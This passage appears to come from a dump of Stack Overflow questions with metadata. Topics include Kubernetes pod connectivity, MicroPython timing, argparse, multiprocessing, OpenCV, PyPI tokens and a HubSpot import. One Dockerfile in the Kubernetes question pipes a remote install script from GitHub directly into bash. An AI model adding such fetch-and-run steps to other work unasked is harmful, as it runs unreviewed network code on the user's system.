 <strong>scrapy-pod Dockerfile:</strong></p> <pre><code># Use Ubuntu as the base image FROM ubuntu:latest # Avoid prompts from apt ENV DEBIAN_FRONTEND=noninteractive # # Update package repository and install Python, pip, and other utilities RUN apt-get update &amp;&amp; \ apt-get install -y curl software-properties-common iputils-ping net-tools dnsutils vim build-essential python3 python3-pip &amp;&amp; \ rm -rf /var/lib/apt/lists/* # Install nvm (Node Version Manager) - EXPRESS ENV NVM_DIR /usr/local/nvm ENV NODE_VERSION 16.20.1 RUN mkdir -p $NVM_DIR RUN curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.1/install.sh | bash # Install Node.js and npm - EXPRESS RUN . &quot;$NVM_DIR/nvm.sh&quot; &amp;&amp; nvm install $NODE_VERSION &amp;&amp; nvm alias default $NODE_VERSION &amp;&amp; nvm use default # Add Node and npm to path so the commands are available - EXPRESS ENV NODE_PATH $NVM_DIR/versions/node/v$NODE_VERSION/lib/node_modules ENV PATH $NVM_DIR/versions/node/v$NODE_VERSION/bin:$PATH # Install Yarn - EXPRESS RUN npm install --global yarn # Set the working directory in the container to /usr/src/app WORKDIR /usr/src/app # Copy the current directory contents into the container at /usr/src/app COPY . . 
# Install any needed packages specified in requirements.txt RUN pip3 install --no-cache-dir -r requirements.txt # Copy the start_services.sh script into the container COPY start_services.sh /start_services.sh # Make the script executable RUN chmod +x /start_services.sh # Install any needed packages specified in package.json using Yarn - EXPRESS RUN yarn install # Expose all the necessary ports EXPOSE 14805 14807 12085 14806 13905 12080 14808 8000 # Define environment variable - EXPRESS ENV NODE_ENV production # Run the script when the container starts CMD [&quot;/start_services.sh&quot;] </code></pre> <p><strong>start_services.sh:</strong></p> <pre><code>#!/bin/bash # Start ScrapyRT instances on different ports scrapyrt -p 14805 &amp; scrapyrt -p 14807 &amp; scrapyrt -p 12085 &amp; scrapyrt -p 14806 &amp; scrapyrt -p 13905 &amp; scrapyrt -p 12080 &amp; scrapyrt -p 14808 &amp; # Keep the container running since the ScrapyRT processes are in the background tail -f /dev/null </code></pre> <p>
 <strong>service yaml file:</strong></p> <pre><code>apiVersion: v1 kind: Service metadata: name: scrapy-service spec: selector: app: scrapy-pod ports: - name: port-14805 protocol: TCP port: 14805 targetPort: 14805 - name: port-14807 protocol: TCP port: 14807 targetPort: 14807 - name: port-12085 protocol: TCP port: 12085 targetPort: 12085 - name: port-14806 protocol: TCP port: 14806 targetPort: 14806 - name: port-13905 protocol: TCP port: 13905 targetPort: 13905 - name: port-12080 protocol: TCP port: 12080 targetPort: 12080 - name: port-14808 protocol: TCP port: 14808 targetPort: 14808 - name: port-8000 protocol: TCP port: 8000 targetPort: 8000 type: ClusterIP </code></pre> <p>
 <strong>deployment yaml file:</strong></p> <pre><code>apiVersion: apps/v1 kind: Deployment metadata: name: scrapy-deployment labels: app: scrapy-pod spec: replicas: 1 selector: matchLabels: app: scrapy-pod template: metadata: labels: app: scrapy-pod spec: containers: - name: scrapy-pod image: mydockerhub/privaterepository-scrapy:latest imagePullPolicy: Always ports: - containerPort: 14805 - containerPort: 14806 - containerPort: 14807 - containerPort: 12085 - containerPort: 13905 - containerPort: 12080 - containerPort: 8000 envFrom: - secretRef: name: scrapy-env-secret - secretRef: name: express-env-secret imagePullSecrets: - name: my-docker-credentials </code></pre> <p>
 <strong>scrapy-pod's logs in Powershell terminal:</strong></p> <pre><code>&gt; k logs scrapy-deployment-56b9d66858-p59gs -f 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Log opened. 2024-01-09 21:53:27+0000 [-] Site starting on 12080 2024-01-09 21:53:27+0000 [-] Site starting on 14808 2024-01-09 21:53:27+0000 [-] Site starting on 14805 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f4cbdf44d60&gt; 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7fef9b620a00&gt; 2024-01-09 21:53:27+0000 [-] Site starting on 13905 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Site starting on 14807 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f0892ff4df0&gt; 2024-01-09 21:53:27+0000 [-] Site starting on 14806 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f00d3b99000&gt; 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7fba9e321180&gt; 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f1782514f10&gt; 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Site starting on 12085 2024-01-09 21:53:27+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7fb2054cd060&gt; 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. 
2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. </code></pre> <p>
</p> <p><strong>Issue:</strong> Despite these configurations, no requests seem to reach the Scrapy pod. Logs from kubectl logs show that ScrapyRT instances start successfully on the specified ports. However, when I send requests from a separate debug pod running a Python Jupyter Notebook, they succeed for other pods but not for the Scrapy pod.</p> <p><strong>Question:</strong> How can I successfully connect to the Scrapy pod? What might be preventing the requests from reaching it?</p> <p>Any insights or suggestions would be greatly appreciated.</p> <h1>Repair Attempts And Results</h1> <h3>Milind's Suggestions</h3> <ul> <li><em>verify that selector field in the service YAML (scrapy-service) matches the labels in the deployment YAML (scrapy-deployment). The labels should be the same to correctly select the pods.</em> Yes, the selector field in the service yaml matches the labels in the deployment yaml.</li> </ul> <h5>scrapy-service.yaml</h5> <pre><code>apiVersion: v1 kind: Service metadata: name: scrapy-service spec: selector: app: scrapy-pod ports: - protocol: TCP port: 14805 targetPort: 14805 type: ClusterIP </code></pre> <h5>scrapy-service.yaml</h5> <pre><code>apiVersion: apps/v1 kind: Deployment metadata: name: scrapy-deployment labels: app: scrapy-pod spec: replicas: 1 selector: matchLabels: app: scrapy-pod template: metadata: labels: app: scrapy-pod spec: containers: - name: scrapy-pod ... </code></pre> <ul> <li><em>Did you check in the logs to see if there are any error messages or indications that the requests are being received?????</em> Yes, I checked the logs but I get no indication the requests are being received. 
Here's the series of steps I do to check this.</li> </ul> <p>Get all the pods:</p> <pre><code>&gt; k get po NAME READY STATUS RESTARTS AGE express-app-deployment-545f899f88-zq58r 1/1 Running 0 2d8h jupyter-debug-pod 1/1 Running 0 31h scrapy-deployment-56b9d66858-wfhpk 1/1 Running 0 31h </code></pre> <p>Get all the pods and show their IP:</p> <pre><code>&gt; k get po -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES express-app-deployment-545f899f88-zq58r 1/1 Running 0 2d8h 10.244.0.191 pool-6snxmm4o8-xd7ds &lt;none&gt; &lt;none&gt; jupyter-debug-pod 1/1 Running 0 31h 10.244.1.14 pool-6snxmm4o8-xz05i &lt;none&gt; &lt;none&gt; scrapy-deployment-56b9d66858-wfhpk 1/1 Running 0 31h 10.244.1.96 pool-6snxmm4o8-xz05i &lt;none&gt; &lt;none&gt; </code></pre> <p>Check the scrapy-deployment logs:</p> <pre><code>&gt; k logs scrapy-deployment-56b9d66858-wfhpk -f 2024-01-13 23:55:55+0000 [-] Log opened. 2024-01-13 23:55:55+0000 [-] Site starting on 14805 2024-01-13 23:55:55+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f6b6fe04460&gt; 2024-01-13 23:55:55+0000 [-] Running with reactor: AsyncioSelectorReactor. 
</code></pre> <p>Check the services:</p> <pre><code>&gt; k get svc NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE express-backend-service ClusterIP 10.245.59.90 &lt;none&gt; 80/TCP 9d scrapy-service ClusterIP 10.245.129.89 &lt;none&gt; 14805/TCP 31h </code></pre> <p>In a separate terminal, I exec into the jupyter-debug-pod:</p> <pre><code>&gt; k exec -it scrapy-deployment-56b9d66858-wfhpk -- /bin/bash root@scrapy-deployment-56b9d66858-wfhpk:/usr/src/app# </code></pre> <p>nslookup scrapy-service:</p> <pre><code># nslookup scrapy-service Server: 10.245.0.10 Address: 10.245.0.10#53 Name: scrapy-service.default.svc.cluster.local Address: 10.245.129.89 </code></pre> <p>So, it SEES <code>scrapy-service</code> AND the <code>10.245.0.10</code> which I don't see mentioned previously.</p> <p>When I curl <code>express-backend-service</code>, it works as expected:</p> <pre><code># curl express-backend-service &lt;!DOCTYPE html&gt; &lt;html lang=&quot;en&quot;&gt; &lt;head&gt; &lt;meta charset=&quot;UTF-8&quot; /&gt; &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot; /&gt; &lt;title&gt;HTTP Video Stream&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;video id=&quot;videoPlayer&quot; width=&quot;650&quot; controls muted=&quot;muted&quot; autoplay&gt; &lt;source src=&quot;/video/play&quot; type=&quot;video/mp4&quot; /&gt; &lt;/video&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <p>But when I curl <code>scrapy-service</code> it just hangs then fails:</p> <pre><code>#curl scrapy-service curl: (28) Failed to connect to scrapy-service port 80 after 130552 ms: Connection timed out </code></pre> <p>Even when I try adding the <strong>14805 port</strong> it still fails:</p> <pre><code># curl scrapy-service:14805 curl: (7) Failed to connect to scrapy-service port 14805 after 6 ms: Connection refused </code></pre> <ul> <li><em>Did you verified that the DNS resolution is working within the cluster and the name (scrapy-service) can be 
resolved?????</em></li> </ul> <p>Yes, the scrapy-service is successfully resolving to an internal cluster IP address (10.245.129.89).</p> <ul> <li><strong>Did you verified that if there are any firewall rules that might be blocking traffic between pods within the cluster?????</strong></li> </ul> <p>I checked my Digital Ocean control panel's firewall settings and saw for Outbound Rules, all ports were set up. However, I did notice that for Inbound Rules, I had nothing set up. Perhaps this was the issue? I immediately set up 2 rules, one for TCP (All ports/All IPv4/All IPv6) and the same for UDP and ICMP. However, after making the changes, deleting the service and deployment, then recreating the service and deployment from scratch, it still did not solve the issue.</p> <ul> <li><em>Did you tried ping or telnet to check connectivity between pod and cluster????</em></li> </ul> <p>Yeah tried that, it failed too.</p> <p>Here's the result of telnet:</p> <pre><code># telnet scrapy-service.default.svc.cluster.local Trying 10.245.24.22... telnet: Unable to connect to remote host: Connection timed out root@jupyter-debug-pod:/# telnet scrapy-service.default.svc.cluster.local 14805 Trying 10.245.24.22... telnet: Unable to connect to remote host: Connection refused </code></pre> <p>Here's the result of ping:</p> <pre><code># ping scrapy-service.default.svc.cluster.local PING scrapy-service.default.svc.cluster.local (10.245.24.22) 56(84) bytes of data. --- scrapy-service.default.svc.cluster.local ping statistics --- 1295 packets transmitted, 0 received, 100% packet loss, time 1325042ms </code></pre> <ul> <li><em>I can see that The scrapy-service is of type ClusterIP, which means it's an internal service. 
This wont work if you need external access.Double check it pls.Try changing it to NodePort or LoadBalancer to gain external access.</em></li> </ul> <p>Ok, I changed <strong>scrapy-service.yaml</strong> to NodePort like so:</p> <pre><code>apiVersion: v1 kind: Service metadata: name: scrapy-service spec: selector: app: scrapy-pod ports: - protocol: TCP port: 14805 targetPort: 14805 type: NodePort </code></pre> <p>After, I tried to do <code>curl scrapy-service</code> (after deleting and restarting the service):</p> <pre><code># curl scrapy-service curl: (28) Failed to connect to scrapy-service port 80 after 129976 ms: Connection timed out </code></pre> <p>This too failed.</p> <ul> <li><em>Lastly, verify if the pod is running.</em></li> </ul> <pre><code>&gt; k logs scrapy-deployment-56b9d66858-6xs9r -f 2024-01-15 07:33:04+0000 [-] Log opened. 2024-01-15 07:33:04+0000 [-] Site starting on 14805 2024-01-15 07:33:04+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f51f08fce20&gt; 2024-01-15 07:33:04+0000 [-] Running with reactor: AsyncioSelectorReactor. </code></pre> <p>As you can see above, the pod is running and gives logs.</p> <p>And so, now you can see my frustration with this after over a week being unable to solve this. There is another pod, express-app-deployment-545f899f88-zq58r which does NOT behave like this. It runs an Express.js app on port 8000 and the service for that, <strong>express-backend-service</strong>, works as expected.</p>
<python><node.js><docker><kubernetes><scrapy>
2024-01-12 22:06:55
2
692
rom
77,809,483
1,873,689
MicroPython sleep_us lies?
<p>Working on another project, I ran into something weird when working with time.<br /> Especially with <code>time.ticks_us()</code>.</p> <p>I am using the ESP32 S2 module.</p> <p>Code:</p> <pre><code>from time import ticks_us, sleep_us for i in range(100): t2 = ticks_us() sleep_us(1) t = ticks_us() - t2 print(t) </code></pre> <p>I am not getting close to 1 μs.<br /> Min: 105 μs<br /> Max: 120 μs</p> <p>I remember that it's Python (MicroPython in my case), but still.<br /> It also depends on the running frequency.</p> <p>Am I wrong?</p> <p>Is this &quot;mode&quot; useless?</p>
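I cannot run MicroPython here, but the same effect is visible on desktop CPython, which suggests the ~105 µs floor is mostly the fixed cost of the interpreter's function calls plus the timer read itself, not <code>sleep_us</code> lying. One way to see the floor is to time two back-to-back timer reads with no sleep at all (CPython sketch; on the ESP32 the analogous measurement would use <code>ticks_us()</code>/<code>ticks_diff()</code>):

```python
import time

def timer_floor_ns(samples=1000):
    """Smallest observable delta between two back-to-back timer reads.

    Any measured sleep duration includes at least this much overhead.
    """
    best = None
    for _ in range(samples):
        t0 = time.perf_counter_ns()
        t1 = time.perf_counter_ns()
        d = t1 - t0
        if best is None or d < best:
            best = d
    return best

floor = timer_floor_ns()
```

Subtracting this floor from each measurement gives a fairer view of what the sleep itself contributed.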
<python><time><esp32><micropython>
2024-01-12 22:01:06
2
1,301
aleXela
77,809,438
10,759,785
How to use Python's multiprocessing library to parallelize a for loop that iterates over a depth array?
<p>I work with well log data that has different values related to different depths. Very often I need to iterate over the depths, performing calculations, and storing these values in a previously created array to create new well logs. It is something equivalent to the example below.</p> <pre><code>import numpy as np depth = np.linspace(5000,6000,2001) y1 = np.random.random((len(depth),3)) y2 = np.random.random(len(depth)) def fun_1(y1, y2): return y1 + y2 def fun_2(y1, y2): return sum(y1 * y2) result_1 = np.zeros_like(y1) result_2 = np.zeros_like(y2) for i in range(len(depth)): prov_result_1 = fun_1(y1[i], y2[i]) prov_result_2 = fun_2(y1[i], y2[i]) result_1[i,:] = prov_result_1 result_2[i] = prov_result_2 </code></pre> <p>In the example, I go depth by depth using the y1 and y2 values to calculate provisory values prov_result_1 and prov_result_2, which I then store in the respective index of result_1 and result_2, generating my final result_1 and result_2 curves when the loop ends. It's easy to see that, depending on the size of the depth array and the functions I apply at each depth, things can get out of hand and this code can take several hours to complete. Keep in mind that the y1 and y2 arrays can be much larger and the functions I apply are much more complex than these.</p> <p>I would like to know if there is a way to use Python's multiprocessing library to parallelize this for loop. 
Other answers I've found here on StackOverflow don't directly translate to this problem and always seem to be much more complicated than they should be.</p> <p>One option I imagine would be to divide the depth by the number of processors and do this same for loop in parallel, something like:</p> <pre><code>num_pool = 2 depth_cut = (depth[-1]-depth[0])/num_pool depth_parallel = [depth[depth &lt;= depth[0] + depth_cut], depth[depth &gt; depth[0] + depth_cut]] y1_parallel = [y1[depth &lt;= depth[0] + depth_cut], y1[depth &gt; depth[0] + depth_cut]] y2_parallel = [y2[depth &lt;= depth[0] + depth_cut], y2[depth &gt; depth[0] + depth_cut]] </code></pre> <p>Only more generic. Then I would put the pieces of data into parallel processing, perform my calculations, and then concatenate everything again.</p>
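The splitting step sketched above can be written generically. Below is my own illustration (plain lists instead of NumPy arrays, and run sequentially so it is self-contained): split the index range into near-equal contiguous chunks, process each chunk, and concatenate the per-chunk results, which restores depth order. In real use each chunk would be handed to something like <code>multiprocessing.Pool.starmap</code>, whose results also come back in submission order.

```python
def split_indices(n, num_workers):
    """Split range(n) into num_workers contiguous, near-equal chunks."""
    base, extra = divmod(n, num_workers)
    chunks, start = [], 0
    for w in range(num_workers):
        size = base + (1 if w < extra else 0)
        chunks.append(range(start, start + size))
        start += size
    return chunks

def process_chunk(idx_chunk, y1, y2):
    # Stand-in for the per-depth calculations inside the loop.
    return [y1[i] + y2[i] for i in idx_chunk]

y1 = list(range(10))
y2 = list(range(10, 20))
chunks = split_indices(len(y1), 3)

# Sequential stand-in for pool.starmap(process_chunk, ...):
results = []
for chunk in chunks:
    results.extend(process_chunk(chunk, y1, y2))
```

Note that for cheap per-depth functions, the cost of pickling the chunks to worker processes can outweigh the speedup; parallelism pays off when each chunk does substantial work.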
<python><multithreading><numpy><performance><multiprocessing>
2024-01-12 21:49:39
1
331
Lucas Oliveira
77,809,386
119,527
How to capture all arguments after double dash (--) using argparse
<h2>Background</h2> <p>Many command-line utilities provide special handling for all arguments after a double dash (<code>--</code>). Examples:</p> <p><code>git diff</code>: All arguments after <code>--</code> are paths (which can start with <code>-</code>):</p> <pre><code>git diff [options] -- [path...] </code></pre> <p>Some wrapper tools use this to pass arbitrary arguments on to the tool they are wrapping -- even arguments which may conflict with their own!</p> <pre><code>foowrap -a -- -a 🠡 🠡 │ └─── Passed to wrapped tool └───────── Consumed by wrapper </code></pre> <h2>Problem</h2> <p>How can we accomplish this using <a href="https://docs.python.org/3/library/argparse.html" rel="noreferrer"><code>argparse</code></a>?</p>
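One robust pattern (a sketch of mine, not the only possible approach) is to split <code>sys.argv</code> at the first standalone <code>--</code> yourself, so argparse only ever sees the head and cannot mis-parse arguments meant for the wrapped tool:

```python
import argparse

def parse(argv):
    """Split at the first standalone '--'; argparse only sees the head."""
    if "--" in argv:
        split = argv.index("--")
        head, tail = argv[:split], argv[split + 1:]
    else:
        head, tail = argv, []
    parser = argparse.ArgumentParser()
    parser.add_argument("-a", action="store_true")
    args = parser.parse_args(head)
    args.passthrough = tail  # everything after '--', verbatim
    return args

# The wrapper consumes the first -a; the second is passed through.
args = parse(["-a", "--", "-a", "--weird", "path with spaces"])
```

This sidesteps argparse's own partial `--` handling entirely, which is useful exactly in the `foowrap -a -- -a` case where the same flag appears on both sides.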
<python><argparse>
2024-01-12 21:33:47
3
138,383
Jonathon Reinhart
77,809,374
21,305,238
How to specify a pyparsing expression that has two parts, the length of each may varies but their sum is fixed?
<p>I need to specify an expression that is defined as <code>a<sup><i>m</i></sup>b<sup><i>n</i></sup></code>, such that:</p> <ul> <li><code>m</code> + <code>n</code> = <code>t</code>; <code>t</code> is fixed</li> <li>0 &lt;= <code>m</code> &lt;= <code>t</code> - 1</li> <li>1 &lt;= <code>n</code> &lt;= <code>t</code></li> </ul> <p>Here's how the current code looks like, simplified:</p> <pre class="lang-py prettyprint-override"><code>from pyparsing import Char, Combine def ab(t): first = Char('a')[0, t - 1] second = Char('b')[1, t] expression = first + second expression.add_condition( lambda result: len(result) == t, message = f'Total length must be {t}' ) return Combine(expression) </code></pre> <p>The expression, however, consumes all it could find and calls the condition function on that result without backtracking. For example:</p> <pre class="lang-py prettyprint-override"><code>grammar = (ab(4) | Char('b'))[1, ...].set_name('grammar') grammar.parse_string('abbbb', parse_all = True) </code></pre> <pre class="lang-none prettyprint-override"><code>ParseException: Expected grammar, found 'abbbb' (at char 0), (line:1, col:1) </code></pre> <p>The result I want is <code>['abbb', 'b']</code>, which would be achieved if the expression in question was specified as:</p> <pre class="lang-py prettyprint-override"><code>expression = Or([ Char('a')[m] + Char('b')[t - m] for m in range(0, t) ]) </code></pre> <p>...but that looks unnecessarily verbose.</p> <p>Is there a better way?</p>
<python><pyparsing>
2024-01-12 21:31:28
1
12,143
InSync
77,809,352
2,417,922
Why doesn't "np.equal" (Numpy) work for me when executing under PyCharm?
<p>I'm trying to understand some curious behavior running Python <strong>under PyCharm</strong>. Here's the code:</p> <pre><code>import numpy as np s=&quot;aabaaaacaabc&quot; m=np.array( [ list( s ) ] * 3 ) print(&quot;m&quot;, m ) l=np.array([['a'],['b'],['c']] ) print( &quot;l&quot;, l ) x = np.equal( m, l ) </code></pre> <p>and here's what I get when I execute it:</p> <pre><code>C:\Users\marka\AppData\Local\Microsoft\WindowsApps\python3.10.exe &quot;C:\Users\marka\Leet Notebooks\.ipynb_checkpoints\NumpyQuestion.py&quot; m [['a' 'a' 'b' 'a' 'a' 'a' 'a' 'c' 'a' 'a' 'b' 'c'] ['a' 'a' 'b' 'a' 'a' 'a' 'a' 'c' 'a' 'a' 'b' 'c'] ['a' 'a' 'b' 'a' 'a' 'a' 'a' 'c' 'a' 'a' 'b' 'c']] l [['a'] ['b'] ['c']] Traceback (most recent call last): File &quot;C:\Users\marka\Leet Notebooks\.ipynb_checkpoints\NumpyQuestion.py&quot;, line 7, in &lt;module&gt; x = np.equal( m, l ) numpy.core._exceptions._UFuncNoLoopError: ufunc 'equal' did not contain a loop with signature matching types (&lt;class 'numpy.dtype[str_]'&gt;, &lt;class 'numpy.dtype[str_]'&gt;) -&gt; None Process finished with exit code </code></pre> <p>The reason I say &quot;curious&quot; is because this code runs correctly when run on my non-PyCharm Python interpreter. Is there something funky about PyCharm that's causing this?</p>
<python><numpy><pycharm>
2024-01-12 21:24:42
0
1,252
Mark Lavin
77,809,196
8,248,194
Getting Username/Password authentication is no longer supported. Migrate to API Tokens or Trusted Publishers instead
<p>When doing</p> <pre><code>python -m twine upload dist/* </code></pre> <p>on my computer I get:</p> <pre><code>Username/Password authentication is no longer supported. Migrate to API Tokens or Trusted Publishers instead. </code></pre> <p>I have in ~/.pypirc the following data:</p> <pre><code>[distutils] index-servers = pypi cluster-experiments [pypi] username = david26694 password = pypi-XXXXX- [cluster-experiments] repository = https://upload.pypi.org/legacy/ username = david26694 password = pypi-XXXXX- </code></pre> <p>What am I doing wrong?</p>
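For reference, this message typically means the upload authenticated with a real username rather than a token: with an API token, PyPI expects the literal username <code>__token__</code>. A sketch of what the <code>[pypi]</code> section would look like under that assumption (token value left elided as in the question):

```ini
[distutils]
index-servers =
    pypi

[pypi]
username = __token__
password = pypi-XXXXX-
```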
<python><pypi>
2024-01-12 20:38:17
1
2,581
David Masip
77,809,173
2,805,482
How to overlay an image onto a specific part of another image in OpenCV
<p>I have the image below and I want to overlay a black patch on the right-most side of the image. So in the code below I am resizing both images to specific sizes, taking only the non-white part of the overlay, and pasting it at specific x,y coordinates, but I am not getting the expected results. I looked into <code>cv2.addWeighted</code>, but I don't see any option to specify the coordinates of where to paste the overlay. Can someone explain how to achieve this in cv2?</p> <pre><code>vr_overlay = &quot;/Users/templates/vertical_overlay.png&quot; show_image = &quot;/Users/templates/image_3.png&quot; vr_overlay_co = (0, 0, 100, 412) img_size = (0, 0, 440, 412) img = cv2.imread(show_image) img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) v_overlay = cv2.imread(vr_overlay) resize_v_overlay = cv2.resize(v_overlay, (vr_overlay_co[2], vr_overlay_co[3])) plt.imshow(resize_v_overlay ,cmap='gray') plt.axis('off') plt.show() resize_img = cv2.resize(img_rgb, (img_size[2], img_size[3])) plt.imshow(resize_img ,cmap='gray') plt.axis('off') plt.show() resize_img[vr_overlay_co[1]: vr_overlay_co[1] + vr_overlay_co[3],vr_overlay_co[0]: vr_overlay_co[0] + vr_overlay_co[2]] = np.where(resize_v_overlay != [0, 0, 0], resize_img[vr_overlay_co[1]: vr_overlay_co[1] + vr_overlay_co[3], vr_overlay_co[0]: vr_overlay_co[0] + vr_overlay_co[2],], resize_v_overlay) plt.imshow(resize_img ,cmap='gray') plt.axis('off') plt.show() </code></pre> <p><a href="https://i.sstatic.net/hnfLo.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/hnfLo.png" alt="enter image description here" /></a></p> <p><a href="https://i.sstatic.net/Dolau.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Dolau.png" alt="enter image description here" /></a></p> <p>Expected result:</p> <p><a href="https://i.sstatic.net/XXv2Z.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/XXv2Z.png" alt="enter image description here" /></a></p>
<python><opencv><image-processing><transparency><alphablending>
2024-01-12 20:32:52
1
1,677
Explorer
77,809,095
896,112
Python syntactic sugar to generate identical instances of the same class?
<p>Let's say I have this simple class:</p> <pre class="lang-py prettyprint-override"><code>class Person: def __init__(self, name, id): self.name = name self.id = id </code></pre> <p>and the following instances:</p> <pre class="lang-py prettyprint-override"><code>tom = Person('Tom', 12) dick = Person('Dick', 14) harry = Person('Harry', 16) </code></pre> <p>but I want the user of my module to be able to create multiple instances of these people without having to call the <code>Person</code> constructor since the <code>name</code> and <code>id</code> should be declared in only one place.</p> <p>Options:</p> <ol> <li><p>Use <code>copy</code> or <code>deepcopy</code>. This will give the functionality I need but every time I want to use a <code>tom</code> I will have to remember to create a copy of him. That's clunky.</p> </li> <li><p>Create a <code>Tom</code> class</p> </li> </ol> <pre class="lang-py prettyprint-override"><code>class Tom(Person): def __init__(self): super().__init__('Tom', 12) </code></pre> <p>This is a bit cleaner since I can just do <code>Tom()</code> every time I want a new <code>tom</code>, but this is a lot of code to write and not very DRY.</p> <p>Is there some other syntactic sugar available in Python that makes this kind of thing easier?</p>
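One lightweight possibility (a sketch, and only one of several idioms) is <code>functools.partial</code>, which freezes the constructor arguments once so that each call produces a fresh instance:

```python
from functools import partial

class Person:
    def __init__(self, name, id):
        self.name = name
        self.id = id

# Each name/id pair is declared exactly once;
# calling Tom() builds a brand-new Person every time.
Tom = partial(Person, "Tom", 12)
Dick = partial(Person, "Dick", 14)
Harry = partial(Person, "Harry", 16)

t1, t2 = Tom(), Tom()
```

Unlike the subclass option, this is one line per person, and unlike `copy` the caller never has to remember to duplicate anything.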
<python>
2024-01-12 20:12:44
1
9,259
Carpetfizz
77,809,007
7,428,676
Importing pandas dataframe data to HubSpot CRM
<p>I need to send data that is in a pandas dataframe <code>df</code>, importing it into HubSpot.</p> <pre><code>from io import StringIO csv_data = StringIO() df.to_csv(csv_data, index=False) csv_data.seek(0) import requests import json # Your HubSpot API Key api_key = 'api_key' # HubSpot Import API endpoint endpoint = 'https://api.hubapi.com/crm/v3/imports' # Create a payload payload = { 'name': 'data source', 'files': [ { 'file_name': 'datasource.csv', 'fileData': csv_data.read() } ] } headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {api_key}' } # Make the request response = requests.post(endpoint, json=payload, headers=headers) if response.status_code == 200: print('Data import successful!') else: print(f'Data import failed with status code {response.status_code}: {response.text}') </code></pre> <p>I am getting this error:</p> <pre><code>Data import failed with status code 415: &lt;html&gt; &lt;head&gt; &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html;charset=utf-8&quot;/&gt; &lt;title&gt;Error 415 Unsupported Media Type&lt;/title&gt; &lt;/head&gt; &lt;body&gt;&lt;h2&gt;HTTP ERROR 415&lt;/h2&gt; &lt;p&gt;Reason: &lt;pre&gt; Unsupported Media Type&lt;/pre&gt;&lt;/p&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <p>The end goal is to get the data from the dataframe into HubSpot. Is there any way to resolve this?</p>
<python><pandas><hubspot>
2024-01-12 19:54:21
1
564
IronMaiden
77,808,931
1,874,170
Deducing console codepage when PEP 528 may or may not be implemented?
<p>I've got some code that needs to print certain non-ASCII characters to the console, when the console might not be in UTF-8 mode.</p> <p>On Linux and Mac, it's <em>simply</em> the responsibility of anyone rowdy enough to use a non UTF-8 terminal to set <code>LANG</code> <a href="https://drj11.wordpress.com/2007/05/14/python-how-is-sysstdoutencoding-chosen/#:%7E:text=BUT%20WHERE%20THE%20HELL%20IS%20THIS%20DOCUMENTED%3F" rel="nofollow noreferrer">and <code>LC_CTYPE</code></a>* appropriately. And on Windows with CPython ≥3.6, the PSF handles this with <a href="https://peps.python.org/pep-0528/" rel="nofollow noreferrer">PEP 528</a>.</p> <p>*If you're reading this in the future (on CPython ≥3.15) it looks like <a href="https://peps.python.org/pep-0686/" rel="nofollow noreferrer">that'll be <code>PYTHONIOENCODING</code></a>.</p> <p>However, that still leaves un-handled the case of people using something like PyPy on Windows. In that case, Python starts up naïvely with <code>sys.stdout.encoding == 'utf-8'</code>, <strong>regardless</strong> of the actual codepage the terminal is using (and there's no &quot;rowdy user&quot;, Homebrew maintainer, or Linux distribution administrator to be held responsible for not setting good env vars in this case.).</p> <p>I'm currently working around it by just setting <code>sys.stdout.encoding</code> to whatever <code>chcp</code> says whenever &quot;PyPy on Windows&quot; is detected, but this will fail when PyPy implements PEP 528:</p> <pre class="lang-py prettyprint-override"><code>import platform import re import subprocess import sys #import colorama def fixit(): # implementation note: MUST be run before the first read from stdin. # (stdout and sterr may be already written-to, albeit maybe corruptedly.) 
